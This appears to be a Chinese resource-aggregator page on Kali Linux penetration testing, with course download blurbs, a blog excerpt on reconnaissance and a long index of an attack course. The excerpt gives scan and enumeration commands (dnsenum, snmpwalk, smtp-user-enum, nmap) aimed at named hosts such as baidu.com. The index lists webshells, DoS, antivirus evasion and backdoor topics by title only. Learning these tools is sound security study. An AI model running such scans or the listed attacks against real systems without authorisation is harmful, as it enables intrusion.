精华内容
下载资源
问答
  • │ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
  • Kali Linux 渗透测试的艺术(中文版) ,专门针对安全的 渗透测试的书籍.
  • Kali Linux渗透测试的艺术,中文高清.pdf
  • 课程标题:Kali Linux渗透测试基础入门到进阶实战全程课 一、课程声明        本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规! 二、课程概要 &...
  • Kali Linux渗透测试的艺术 PDF电子书 带书签,这是书的前半部分样张,仅供大家预览,如有需要,请购买正版。
  • Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
  • 试了这么多就这个最实用
  • Kali Linux 是专门用于渗透测试linux操作系统,它由BackTrack发展而来,在整合了IWHAX、WHOPPIX和Auditor这三种渗透测试专用Live linux之后,BackTrack正式改名为Kali Linux。特点:基于Debian的linux发行版、集成...
  • 本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员   &...
  • 本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员     &...
  • kali linux 渗透测试之内网渗透

    千人学习 2020-05-02 13:51:19
    理论加实战结合,学习后具备自动化批量控制内网主机的能力,具备安全工程师岗位的基本能力。 专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。
  • Kali Linux渗透测试实训手册,Kali Linux渗透测试实训手册,
  • KaliLinux渗透测试的艺术,epub格式的电子书。Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。
  • 本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没
  • Kali Linux 渗透测试技术详解,pdf扫描文件,书本内容涵盖渗透测试相关内容
  • Kali Linux渗透测试工具使用技巧篇

    千人学习 2019-12-26 20:36:13
    本课程主要分享Kali Linux渗透测试工具使用技巧教程! 二、课程目标       本课程致力于帮助广大学员掌握Kali Linux渗透工具使用教程! 三、适合人员       1、零基础大学生   &...
  • 测试网络范围 1. 域名查询工具 DMitry工具是用来查询IP或域名WHOIS信息的,用来查询域名是否已经被注册一级注册域名的详细信息。执行命令:dmitry -wnpb baidu.com 输出IP地址、端口号等信息。 netmask工具将域名...

    信息收集

             1. 枚举服务

                     1.1 DNS枚举工具 DNSenum

                                 DNSenum是一款非常强大的域名信息收集工具,可以通过Google或者字典文件猜测可能存在的域名,并对一个网段进行反向查询。在终端执行如下所示的命令:

                                  dnsenum --enum baidu.com

                                  输出信息显示NDS服务的信息信息,其中,包括主机地址、域名服务地址和邮件服务地址。如果幸运的话,还可以看到一个区域传输。使用DNSenum工具检查DNS枚举时,可以使用dnsenum的一些附加选项。查看帮助获得。

    Host's addresses:
    __________________

    baidu.com.                               5        IN    A        39.156.69.79
    baidu.com.                               5        IN    A        220.181.38.148

                                                                                                                                                      
    Name Servers:                                                                                                                                     
    ______________                                                                                                                                    
                                                                                                                                                      
    dns.baidu.com.                           5        IN    A        202.108.22.220                                                                   
    ns2.baidu.com.                           5        IN    A        220.181.33.31
    ns3.baidu.com.                           5        IN    A        112.80.248.64
    ns4.baidu.com.                           5        IN    A        14.215.178.80
    ns7.baidu.com.                           5        IN    A        180.76.76.92

    ... ...

                                    还有一个工具是fierce,和dnsenum性质差不多。fierce主要是对子域名进行扫描和收集信息,获取一个目标主机上所有IP地址和主机信息。

                    1.2 SNMP枚举工具snmpwalk

                                    snmpwalk使用GETNEXT请求,查询指定的所有OID树的信息,并显示给用户。执行命令:snmpwalk -c public 192.168.1.101 -v 1 

                                    snmpcheck工具允许用户枚举SNMP设备的同时将结果以可读的方式输出。可以获取系统信息,设备信息,存储信息,账户信息,进程信息,网络信息,路由信息,网络服务信息,端口信息等。执行命令:snmpcheck -t 192.168.1.101(sudo apt-get install perl-tk 安装缺省的依赖)

                    1.3 SMTP枚举工具smtp-user-enum

                                    smtp-user-enum是针对SMTP服务器的25端口,进行用户名枚举的工具,用以探测服务器已存在的邮箱账户。在SMTP服务上启动用户的SMTP枚举,执行命令smtp-user-enum -M VRFY -U /tmp/users.txt -t 192.168.41.134

     

    2. 测试网络范围

              1. 域名查询工具

                      DMitry工具是用来查询IP或域名WHOIS信息的,用来查询域名是否已经被注册一级注册域名的详细信息。执行命令:dmitry -wnpb baidu.com  输出IP地址、端口号等信息。

                      netmask工具将域名转换成标准的子网掩码格式,执行命令:netmask -s baidu.com,输出信息显示域名的IP地址和子网掩码的值。

               2. 路由跟踪工具scapy

                      scapy是一款强大的交互式数据包处理工具。详细使用可参考scapy官方开源网站。路由跟踪示例:res.unans=traceroute(["www.baidu.com","www.qq.com","www.163.com"],dport=[80,443,maxttl=20,retry=-2),图形化显示res.graph()

     

    3. 识别活跃的主机

                1. 网络映射工具Nmap

                        nmap主要功能有三个:探测主机是否在线、扫描端口、推断主机使用的操作系统。Nmap工作原理:

                         识别活跃主机:查看一个主机是否在线:namp -sP 192.168.1.11,可以看到主机的域名、在线、Mac地址等。也可以使用Nping(Nmap套具)查看,获得更详细的信息。

                         查看打开的端口:nmap 192.168.1.11,查看开放的端口号。

                         查看扫描端口范围:nmap -p 1-1100 192.168.1.11

                         扫描指定端口:nmap -p 22 192.168.4.*

     

    4. 系统指纹识别                    

                          nmap系统指纹识别:nmap -O 192.168.1.11

                          p0f是一款百分之百的被动指纹识别工具。该工具通过分析目标主机发出的数据包,对主机上的操作系统进行鉴别。使用p0f分析wireshark捕获的一个文件,执行:p0f -r /tmp/targethost.pcap -o p0f-result.log

                          使用Nmap工具查看192.168.1.11服务上正在运行的端口。执行命令:nmap -sV 192.168.1.11从输出的信息可以看到目标服务器上运行的端口、服务及版本信息

                          

                           Amap是一个服务枚举工具,识别正在运行在一个指定端口或一个范围端口上的应用程序:amap -bq 192.168.41.134 50-100

                          

     

    5. 其它信息收集:

                        1. Recon-NG:由python编写的一个开源web侦查框架

                        2. ARP侦查工具Netdiscover,是一个主动/被动的ARP侦查工具。使用Netdiscover工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求。

                        3. 搜索引擎工具shodan

                        4. Maltego,开源漏洞评估工具

                        5. CaseFile绘制网络结构图

    展开全文
  • Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper ,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
  • Kali Linux 渗透测试 博客记录

    万次阅读 多人点赞 2017-09-17 14:12:54
    本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 基本环境 基本工具 被动信息收集 主动信息收集 弱点扫描 提权 Web 渗透

    本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

    文章为长时间连载,内容具有连续性,禁止转载!

    ------------------------基本环境------------------------
    Kali Linux渗透测试 001 安装环境
    Kali Linux渗透测试 002 熟悉并设置基本环境
    ------------------------基本工具------------------------
    Kali Linux渗透测试 003 基本工具–NC
    Kali Linux渗透测试 004 基本工具–tcpdump
    ------------------------被动信息收集-------------------
    Kali Linux渗透测试 015 被动信息收集-DNS 简介
    Kali Linux渗透测试 016 被动信息收集-nslookup
    Kali Linux渗透测试 017 被动信息收集-dig
    Kali Linux渗透测试 018 被动信息收集-DNS 字典爆破
    Kali Linux渗透测试 019 被动信息收集-谷歌搜索等其他方式
    Kali Linux渗透测试 020 被动信息收集-recon-ng
    ------------------------主动信息收集-------------------
    Kali Linux渗透测试 021 主动信息收集
    ------------------------弱点扫描------------------------
    Kali Linux渗透测试 035 漏洞基本概念
    Kali Linux渗透测试 036 Nmap-扫描脚本
    Kali Linux渗透测试 037 OpenVAS
    ------------------------提权------------------------
    Kali Linux渗透测试 044 本地提权
    Kali Linux渗透测试 045 读取windows本地密码
    Kali Linux渗透测试 046 利用漏洞提权
    Kali Linux渗透测试 047 配置不当提权
    Kali Linux渗透测试 048 收集敏感信息
    Kali Linux渗透测试 049 清除痕迹
    ------------------------Web 渗透------------------------
    Kali Linux渗透测试 071 HTTrack 爬取整站
    Kali Linux渗透测试 072 扫描工具-Nikto
    Kali Linux渗透测试 073 扫描工具-Vega
    Kali Linux渗透测试 074 扫描工具-Skipfish
    Kali Linux渗透测试 075扫描工具-w3af_console
    Kali Linux渗透测试 076 扫描工具-w3af 身份认证
    Kali Linux渗透测试 077 扫描工具-w3af 截断代理
    Kali Linux渗透测试 078 扫描工具-arachni
    Kali Linux渗透测试 079 扫描工具-OWASP_ZAP
    Kali Linux渗透测试 080 扫描工具-burpsuite
    Kali Linux渗透测试 081 扫描工具-Paros
    Kali Linux渗透测试 082 扫描工具-webscarab
    Kali Linux渗透测试 085 手动漏洞挖掘-php反弹shell
    Kali Linux渗透测试 086 手动漏洞挖掘-命令执行漏洞
    Kali Linux渗透测试 087 手动漏洞挖掘-目录遍历、文件包含漏洞
    Kali Linux渗透测试 088 手动漏洞挖掘-文件上传漏洞
    Kali Linux渗透测试 089 手动漏洞挖掘-SQL注入漏洞
    Kali Linux渗透测试 092 手动漏洞挖掘-SQL盲注
    Kali Linux渗透测试 093 自动注入-Sqlmap
    Kali Linux渗透测试 098 手动漏洞挖掘-XSS 漏洞
    Kali Linux渗透测试 099 自动注入-Xsser
    Kali Linux渗透测试 100 利用工具-Beef
    Kali Linux渗透测试 101 手动漏洞挖掘-CSRF 漏洞
    Kali Linux渗透测试 102 利用工具-Webshell
    Kali Linux渗透测试 103 HTTPS 攻击
    Kali Linux渗透测试 104 SSL 中间人攻击
    Kali Linux渗透测试 105 SSL 拒绝访问攻击
    ------------------------密码破解------------------------
    Kali Linux渗透测试 106 离线密码破解
    Kali Linux渗透测试 107 密码嗅探
    Kali Linux渗透测试 108 中间人攻击
    ------------------------流量操控与隧道------------------------
    Kali Linux渗透测试 114 流量重定向
    Kali Linux渗透测试 115 SSH 隧道
    Kali Linux渗透测试 116 DNS 协议隧道–dns2tcp
    Kali Linux渗透测试 117 DNS 协议隧道–iodine
    Kali Linux渗透测试 118 DNS 协议隧道–NCAT
    Kali Linux渗透测试 119 隧道工具–SOCAT
    Kali Linux渗透测试 120 隧道工具–ptunnel
    Kali Linux渗透测试 121 隧道工具–proxytunnle
    Kali Linux渗透测试 122 隧道工具–sshlh
    Kali Linux渗透测试 123 隧道工具–stunnel4
    ------------------------拒绝服务------------------------
    Kali Linux渗透测试 124 拒绝服务简介
    Kali Linux渗透测试 125 拒绝服务–Syn-Flood攻击
    Kali Linux渗透测试 126 拒绝服务–Smurf 攻击
    Kali Linux渗透测试 127 拒绝服务–Sockstress 攻击
    Kali Linux渗透测试 128 拒绝服务–TearDrop 攻击
    Kali Linux渗透测试 129 拒绝服务–DNS 放大攻击
    Kali Linux渗透测试 130 拒绝服务–SNMP 放大攻击
    Kali Linux渗透测试 131 拒绝服务–NTP 放大攻击
    Kali Linux渗透测试 132 拒绝服务–应用层DoS 攻击
    Kali Linux渗透测试 133 拒绝服务攻击工具
    ------------------------免杀------------------------
    Kali Linux渗透测试 134 拒绝服务攻击工具包
    Kali Linux渗透测试 135 免杀简介
    Kali Linux渗透测试 136 免杀工具–Veil
    Kali Linux渗透测试 137 后门工具–Backdoor-factory
    Kali Linux渗透测试 138 后门工具–Bdfproxy
    ------------------------Metaslpoit------------------------
    Kali Linux渗透测试 142 Mestasploit 基本使用
    Kali Linux渗透测试 143 Mestasploit 信息收集
    Kali Linux渗透测试 144 Mestasploit 弱点扫描
    Kali Linux渗透测试 145 Mestasploit 客户端渗透
    Kali Linux渗透测试 146 Mestasploit 后渗透测试阶段
    Kali Linux渗透测试 147 Armitage
    ------------------------计算机取证------------------------
    Kali Linux渗透测试 150 计算机取证简介
    Kali Linux渗透测试 151 取证工具
    Kali Linux渗透测试 152 活取证死取证

    Kali Linux渗透测试 001 安装环境

    1. 最新版微软软件
    2. ubuntu 安装 LAMP 环境
    3. metasploitable 初次使用时,网页渗透功能错误,需要调整
    4. m0n0wal 防火墙

    Kali Linux渗透测试 002 熟悉并设置基本环境

    1. 熟悉命令
    2. 网络配置
    3. 软件包及插件
    4. 安装JAVA
    5. 安装显卡驱动
    6. 无线网卡补丁
    7. 并发线程限制
    8. 电源优化
    9. 服务开关

    Kali Linux渗透测试 003 基本工具–NC

    1. NETCAT – NC
    2. NCAT

    Kali Linux渗透测试 004 基本工具–tcpdump

    1. 抓包
    2. 筛选
    3. 高级筛选
    4. 过程文档记录

    Kali Linux渗透测试 015 被动信息收集-DNS 简介

    1. 被动信息收集简介
    2. DNS 查询

    Kali Linux渗透测试 016 被动信息收集-nslookup

    1. NSLOOKUP

    Kali Linux渗透测试 017 被动信息收集-dig

    1. DIG
    2. 区域传送
    3. 帮助文件

    Kali Linux渗透测试 018 被动信息收集-DNS 字典爆破

    1. DNS 字典爆破
      1-1. 简介
      1-2. fierce
      1-3. dnsenum
      1-4. dnsmap
      1-5. dnsrecon
    2. DNS 注册信息

    Kali Linux渗透测试 019 被动信息收集-谷歌搜索等其他方式

    1. 搜索引擎
    2. SHODAN
    3. GOOGLE搜索
    4. YANDEX
    5. 查询用户信息
    6. CUPP 制作个人专属字典
    7. 图片信息

    Kali Linux渗透测试 020 被动信息收集-recon-ng

    1. 简介
    2. 具体使用
    3. 模块使用

    Kali Linux渗透测试 035 漏洞基本概念

    1. 发现漏洞
    2. 从信息的维度定义漏洞管理
    3. 弱点扫描类型
    4. 漏洞基本概念
    5. 漏洞管理

    Kali Linux渗透测试 036 Nmap-扫描脚本

    1. Nmap 扫描脚本
    2. smb-vuln-ms10-061.nse

    Kali Linux渗透测试 037 OpenVAS

    1. OpenVAS 简介
    2. 安装过程
    3. 创建扫描任务
    4. 分析扫描结果
    5. 其他设置

    Kali Linux渗透测试 044 本地提权

    1. Windows 系统提权
    2. 注入进程提权

    Kali Linux渗透测试 045 读取windows本地密码

    1. 抓包嗅探
    2. 键盘记录本地密码
    3. 查看本地缓存密码
    4. WCE (WINDOWS CREDENTIAL EDITOR)
    5. fgdump
    6. mimikatz

    Kali Linux渗透测试 046 利用漏洞提权

    1. 使用 Ms011-080 获取 WinXP 的 SYSTEM 权限
    2. Win7 使用 Ms14-068 获取 域控制器的权限
    3. 利用 CVE-2012-0056 提升 linux 权限

    Kali Linux渗透测试 047 配置不当提权

    1. NTFS权限允许 users 修改删除
    2. linux 下查看权限
    3. 应用系统的配置文件

    Kali Linux渗透测试 048 收集敏感信息

    1. 提权之后收集基本信息
    2. WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)
    3. 收集敏感信息

    Kali Linux渗透测试 049 清除痕迹

    1. 清除渗透攻击痕迹

    Kali Linux渗透测试 071 HTTrack 爬取整站

    1. httrack 爬取整站

    Kali Linux渗透测试 072 扫描工具-Nikto

    1. Nikto 简单使用
    2. Nikto-interactive(交互方式)
    3. 设置使用 cookie 自动登录扫描
    4. 使用 LibWhisker 中对 IDS 的躲避技术

    Kali Linux渗透测试 073 扫描工具-Vega

    1. vega 简介
    2. 使用基本流程
    3. 扫描的基本使用
    4. 使用截断代理功能
    5. 在 vega 代理的情况下,浏览器访问 https 站点

    Kali Linux渗透测试 074 扫描工具-Skipfish

    1. Skipfish 简介
    2. Skipfish 基本操作
    3. 身份认证
    4. 提交用户名密码表单

    Kali Linux渗透测试 075扫描工具-w3af_console

    1. w3af_console简单使用

    Kali Linux渗透测试 076 扫描工具-w3af 身份认证

    1. w3af-身份认证 简介
    2. w3af 扫描 IIS 基本身份认证
    3. w3af 扫描集成 Windows 身份验证
    4. 基于表单的身份认证方式
    5. 设置一个HTTP cookie

    Kali Linux渗透测试 077 扫描工具-w3af 截断代理

    1. 截断代理 (另类的身份认证方法)
    2. 截断代理 (修改请求)
    3. 插件中使用截断代理
    4. output 输出插件
    5. exploit

    Kali Linux渗透测试 078 扫描工具-arachni

    1. arachni 简介
    2. 安装升级 arachni
    3. 开始扫描
    4. 功能选项
    5. 预配置文件

    Kali Linux渗透测试 079 扫描工具-OWASP_ZAP

    1. OWASP_ZAP 项目简介
    2. 简单使用
    3. API
    4. 基本设置
    5. OWASP_ZAP 测试的主要流程

    Kali Linux渗透测试 080 扫描工具-burpsuite

    1. burpsuite 简介
    2. 设置代理
    3. Target
    4. 爬网模块
    5. 扫描模块
    6. 扩展模块
    7. intrude
    8. Repeater
    9. Sequencer
    10. Decoder
    11. Compare
    12. burpsuite 项目主配置信息

    Kali Linux渗透测试 081 扫描工具-Paros

    1. Paros 简介
    2. 爬网并扫描
    3. 手动请求
    4. 解码软件

    Kali Linux渗透测试 082 扫描工具-webscarab

    1. 设置代理
    2. 操作演示
    3. 编码
    4. 设置身份认证
    5. 截断代理

    Kali Linux渗透测试 085 手动漏洞挖掘-php反弹shell

    1. 手动漏洞挖掘的原则
    2. 漏洞的本质
    3. 身份认证漏洞
      3-1. 针对身份认证
      3-2. 会话 SessionID
      3-3. 密码找回时的漏洞
    4. 默认安装漏洞
      4-1. phpMyAdminsetup
      4-1-1. 测试 DVWA 的 phpMyAdmin 漏洞
      4-1-2. 写入简单 webshell
      4-1-3. PHP 反弹 shell
      4-2. Ubuntu Debian 默认安装 PHP5-cgi
      4-2-1. 测试漏洞
      4-2-2. 服务器打开侦听端口

    Kali Linux渗透测试 086 手动漏洞挖掘-命令执行漏洞

    1. 命令执行漏洞
    2. 测试 Low 安全模式
      2-1. 测试手段
      2-2. 服务器源码
    3. 测试 Medium 安全模式
      3-1. 测试手段
      3-2. 服务器源码
    4. 测试 high 安全模式
      4-1. 测试手段
      4-2. 服务器源码
    5. 使服务器打开端口
      5-1. Low 安全模式

    Kali Linux渗透测试 087 手动漏洞挖掘-目录遍历、文件包含漏洞

    1. 目录遍历和文件包含
      1-1. 两种漏洞放在一起进行测试
      1-2. 设置 dvwa 可以进行远程文件包含测试
      1-3. 漏洞特征
      1-4. 经典测试方法
      1-5. 绕过字符过滤
      1-6. cookie 注入目录遍历
      1-7. 本地文件包含
      1-8. 远程文件包含
    2. 漏洞利用
    3. 权限配置不当引起的本地文件包含漏洞
    4. 远程文件包含漏洞
      4-1. dvwa测试 Low 级别下的源代码
      4-2. dvwa测试 Medium 级别下的源代码
      4-3. dvwa测试 High 级别下的源代码
      4-4. 远程文件包含漏洞的危害
    5. kali 自带攻击向量的字典文件

    Kali Linux渗透测试 088 手动漏洞挖掘-文件上传漏洞

    1. 文件上传漏洞
    2. 测试文件上传漏洞
      2-1. 正常模式
      2-2. 测试 dvwa Low 安全级别
      2-2-1. 测试漏洞
      2-2-2. 使用 BurpSuite 进行抓包
      2-3. 测试 dvwa Medium 安全级别
      2-3-1. 测试漏洞
      2-3-2. 使用 BurpSui
      2-4. 测试 dvwa High 安全级别
      2-4-1. 测试漏洞
      2-4-2. 使用 BurpSuite 进行抓包
    3. 高安全性解决办法
      3-1. 解决办法
      3-2. 进行测试攻击
    4. 多方面的解决办法

    Kali Linux渗透测试 089 手动漏洞挖掘-SQL注入漏洞

    1. SQL注入
    2. 测试 dvwa Low 安全级别拥有MySQL的root权限
      2-1. 基于报错的检测方法
      2-2. 基于布尔的检测方法
      2-3. 查询字段数
      2-4. 联合查询
      2-5. 可以使用的函数
      2-6. 使用 HackBar
      2-7. 综合查询
      2-8. 使用 BurpSuite
      2-9. 文件操作
    3. 测试 dvwa Low 安全级别无 MySQL 的 root 权限
    4. 测试 dvwa Low 安全级别当数据库可写
    5. 测试 dvwa Medium or High 安全级别
      5-1. 服务器源代码
      5-2. Medium 安全级别下的漏洞分析
      5-3. High 安全级别下的漏洞分析

    Kali Linux渗透测试 092 手动漏洞挖掘-SQL盲注

    1. SQL 盲注简介
    2. 此处的井号和空额一样都是注释
    3. 无权限时

    Kali Linux渗透测试 093 自动注入-Sqlmap

    1. Sqlmap 简介
    2. Target 目标
    3. Requests 请求
    4. Optization 优化
    5. Injection
    6. Detection 检查
    7. Techniques 技术
    8. Fingerprint 指纹信息
    9. Enumeration 枚举
    10. 当前数据库管理系统的账号
    11. 当前数据库名称
    12. Brute force 暴力破解
    13. User-defined function injection 用户定义功能注入
    14. File system access 文件系统访问
    15. Operating system access 操作系统访问
    16. Windows registry access Windows 注册表访问
    17. General 一般操作
    18. Miscellaneous 杂项

    Kali Linux渗透测试 098 手动漏洞挖掘-XSS 漏洞

    1. 简介
    2. 反射型 XSS 漏洞
      2-1. 测试漏洞
      2-2. 常规攻击方法
      2-3. 键盘记录器
      2-4. dvwa 服务器源码
      2-4-1. Low 安全级别
      2-4-2. Medium 安全级别
      2-4-3. High 安全级别
    3. 存储型 XSS 漏洞
      3-1. 验证漏洞
      3-2. 漏洞利用
      3-3. dvwa 服务器源码
      3-3-1. Low 安全级别
      3-3-2. Medium 安全级别
      3-3-3. High 安全级别
    4. DOM型 XSS 漏洞
      4-1. 漏洞利用

    Kali Linux渗透测试 099 自动注入-Xsser

    1. 简介
    2. 简单使用
    3. 进行编码
    4. 使用帮助

    Kali Linux渗透测试 100 利用工具-Beef

    1. 简介
    2. 使用 Beef 进行 XSS 攻击

    Kali Linux渗透测试 101 手动漏洞挖掘-CSRF 漏洞

    1. 简介
    2. 判断漏洞
    3. 服务器源码
      3-1. dvwa Low 安全级别
      3-2. dvwa Medium 安全级别
      3-3. dvwa High 安全级别

    Kali Linux渗透测试 102 利用工具-Webshell

    1. Webshell 演示
    2. 中国菜刀的使用
    3. http1010101321php
    4. 输入密码pass
    5. WeBaCoo Web Backdoor Cookie
    6. Weevely

    Kali Linux渗透测试 103 HTTPS 攻击

    1. HTTPS 简介
    2. openssl 用法
    3. sslscan 用法
    4. sslyze
    5. 在线检查

    Kali Linux渗透测试 104 SSL 中间人攻击

    1. SSL 中间人攻击
    2. sslsplit
    3. Mitmproxy
    4. sslstrip

    Kali Linux渗透测试 105 SSL 拒绝访问攻击

    1. thc-ssl-dos

    Kali Linux渗透测试 106 离线密码破解

    1. 密码破解简介
    2. 在线密码破解
    3. 离线密码破解

    Kali Linux渗透测试 107 密码嗅探

    1. 密码嗅探
    2. 手动欺骗并抓包

    Kali Linux渗透测试 108 中间人攻击

    1. 中间人攻击
    2. Pass the Hash PTH

    Kali Linux渗透测试 114 流量重定向

    1. 流量操控技术

    Kali Linux渗透测试 115 SSH 隧道

    1. 简介
    2. SSH 本地端口转发
    3. SSH 远程端口转发
    4. 动态端口转发
    5. X协议转发

    Kali Linux渗透测试 116 DNS 协议隧道–dns2tcp

    1. 简介
    2. dns2tcp

    Kali Linux渗透测试 117 DNS 协议隧道–iodine

    1. 简介
    2. 测试环境
    3. Windows 客户端

    Kali Linux渗透测试 118 DNS 协议隧道–NCAT

    1. 简介
    2. 测试代理功能
    3. 测试 broker 中介功能
    4. 利用 broker 执行命令
    5. 应用场景
    6. 发送文件

    Kali Linux渗透测试 119 隧道工具–SOCAT

    1. 简介
    2. socat 基本使用
    3. socat 流量操控技术

    Kali Linux渗透测试 120 隧道工具–ptunnel

    1. 简介
    2. 测试环境

    Kali Linux渗透测试 121 隧道工具–proxytunnle

    1. 简介
    2. 实验一
    3. 实验二
    4. 实验三

    Kali Linux渗透测试 122 隧道工具–sshlh

    1. 简介
    2. 测试环境

    Kali Linux渗透测试 123 隧道工具–stunnel4

    1. 简介
    2. 安装之前的测试环境
    3. stunnel 测试环境

    Kali Linux渗透测试 124 拒绝服务简介

    1. 简介服务简介
    2. DoS 分类
    3. 为何会被 DoS

    Kali Linux渗透测试 125 拒绝服务–Syn-Flood攻击

    1. 简介
    2. syn 洪水攻击
    3. 泛洪攻击常伴随 IP 地址欺骗

    Kali Linux渗透测试 126 拒绝服务–Smurf 攻击

    1. 简介
    2. 测试攻击

    Kali Linux渗透测试 127 拒绝服务–Sockstress 攻击

    1. 简介
    2. 脚本攻击
    3. 防御措施

    Kali Linux渗透测试 128 拒绝服务–TearDrop 攻击

    1. 简介
    2. 攻击目标
    3. 攻击脚本

    Kali Linux渗透测试 129 拒绝服务–DNS 放大攻击

    1. 简介
    2. 攻击
    3. Scapy 构造攻击数据包原理
    4. 构造数据包过程

    Kali Linux渗透测试 130 拒绝服务–SNMP 放大攻击

    1. 简介
    2. 安装 SNMP
    3. scapy 构造数据包

    Kali Linux渗透测试 131 拒绝服务–NTP 放大攻击

    1. 简介
    2. 扫描 NTP 服务器
    3. 防御策略

    Kali Linux渗透测试 132 拒绝服务–应用层DoS 攻击

    1. 简介
    2. 攻击测试 MS12-020
    3. Slowhttptest
    4. 攻击测试

    Kali Linux渗透测试 133 拒绝服务攻击工具

    1. rudy
    2. Hping3
    3. nping
    4. Siege
    5. T50
    6. nmap

    Kali Linux渗透测试 134 拒绝服务攻击工具包

    1. 简介
    2. LOIC
    3. HOIC
    4. HULK
    5. DDOSIM
    6. GoldenEye

    Kali Linux渗透测试 135 免杀简介

    1. 恶意软件
    2. 防病毒软件
    3. 免杀技术
    4. 当前现状
    5. 生成病毒程序
    6. 软件保护
    7. 自己编写后门

    Kali Linux渗透测试 136 免杀工具–Veil

    1. Veil-evasion
    2. veil-catapult
    3. 另一种免杀思路
    4. shellter

    Kali Linux渗透测试 137 后门工具–Backdoor-factory

    1. 简介
    2. 使用

    Kali Linux渗透测试 138 后门工具–Bdfproxy

    1. 简介
    2. 使用
    3. 无线流量劫持

    Kali Linux渗透测试 142 Mestasploit 基本使用

    1. 渗透测试者的困扰
    2. Metasploit 简介
    3. Metasploit 架构
    4. 基本使用
    5. Exploit 模块
      1. Active exploit
      2. Passive Exploits
    6. 生成 paylaod
    7. metepreter
      1. 简介
      2. 使用
    8. Meterpreter python 扩展
    9. msfcli

    Kali Linux渗透测试 143 Mestasploit 信息收集

    1. db_nmap
    2. 主机发现扫描
    3. 端口扫描
    4. 僵尸扫描
    5. UDP 扫描
    6. 密码嗅探
    7. SNMP 扫描
    8. SMB 扫描
    9. SSH 扫描
    10. windows 缺少的补丁
    11. mssql 扫描
    12. FTP 扫描

    Kali Linux渗透测试 144 Mestasploit 弱点扫描

    1. 简介
    2. VNC 密码破解
    3. VNC 无密码访问未设置密码
    4. RDP 远程桌面漏洞
    5. 设备后门
    6. VMware ESXi 密码爆破
    7. 利用 WEB API 远程开启虚拟机
    8. HTTP 弱点扫描
    9. wmap
    10. openvas
    11. MSF 直接调用 nessus 执行扫描

    Kali Linux渗透测试 145 Mestasploit 客户端渗透

    1. 简介
    2. 攻击 windows
    3. 攻击 linux
    4. 利用 Acrobat Reader 漏洞执行 payload
    5. 利用 flash 插件漏洞执行 paylaod
    6. 利用 IE 浏览器漏洞执行 payload
    7. 利用 JRE 漏洞执行 payload
    8. 生成 android 后门程序
    9. 宏感染

    Kali Linux渗透测试 146 Mestasploit 后渗透测试阶段
    1.准备工作
    2.获取 system 账号权限
    3.基础操作
    1. 关闭防火墙
    2. 关闭 windefend
    3. bitlocker 加密
    4. 关闭 DEP
    5. 杀死防病毒软件
    6. 开启远程桌面服务
    7. 查看远程桌面
    4. 使用 tokens 攻击域控制器
    5. 注册表
    6. 抓包
    7. 搜索文件
    8. 破解弱口令
    9. 擦除痕迹
    10. pivoting 跳板 枢纽支点
    11. POST 模块
    12. 持久后门
    13. msf 延伸用法之 mimikatz
    14. 代码执行漏洞
    15. RFI 远程文件包含
    16. Karmetasploit

    Kali Linux渗透测试 147 Armitage

    1. 简介

    Kali Linux渗透测试 150 计算机取证简介

    1. 简介
    2. 通用原则
    3. 取证科学
    4. 取证方法

    Kali Linux渗透测试 151取证工具

    1. 制作内存镜像
    2. 分析内存文件
    3. firefoxhistory 插件
    4. USN 日志记录插件
    5. Timeline 插件
    6. 内存取证案例分析

    Kali Linux渗透测试 152活取证死取证

    1. 活取证
      1. 从内存还原文字
      2. 从内存还原图片
      3. 从内存中提取明文密码
      4. volatility 的 mimikatz 插件
      5. Firefox 浏览器审计工具
    2. 死取证
      1. 硬盘镜像
      2. DFF Digital Forensics Framework
      3. autopsy
      4. extundelete
      5. iPhone Backup Analyzer
      6. foremost 美国政府开发
      7. 资料推荐

    文章为长时间连载,内容具有连续性,禁止转载!

    展开全文
  • Kali linux渗透测试第十章 提权本地提权? 已实现本地低权限账号登录? 远程溢出? 直接获得账号密码? 希望获取更高权限? 实现对目标进一步控制本地提权? 系统账号之间权限隔离? 操作系统安全的基础? 用户空间? 内核...
  • Kali Linux渗透测试实战

    热门讨论 2014-03-10 16:50:48
    Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...
  • TechTarget中国原创】KaliLinux的设计目的是渗透测试。不管渗透测试者的起点是白盒测试、黑盒测试,还是灰盒测试,在用Kali或其它工具进行渗透测试时,总要遵循一些步骤。  KaliLinux的设计目的是渗透测试。不管...
  • Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
  • 10套独家渗透测试视频教程,熟练掌握Kali_Linux及metasploit渗透测试工具及渗透测试实战技巧,另赠送Kali_Linux web渗透测试实战教材一套,metasploit渗透测试魔鬼训练营教材一套。
